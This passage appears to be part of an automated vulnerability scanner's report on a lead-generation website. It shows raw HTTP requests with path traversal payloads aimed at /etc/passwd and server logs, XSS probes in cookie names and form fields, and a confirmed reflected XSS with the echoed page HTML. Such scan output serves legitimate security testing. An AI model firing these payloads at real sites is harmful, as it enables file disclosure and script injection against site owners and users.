OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000499)%3c%2fscript%3e&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:18 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=294AE1C227BA40E3436EFCBE59B0790A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="'"--></style></script><script>netsparker(0x000499)</script>"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST '"--></style></script><script>alert(0x0004AB)</script>
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004AB)%3c%2fscript%3e&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=95092FFA8350006F73409A3543069D56; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact 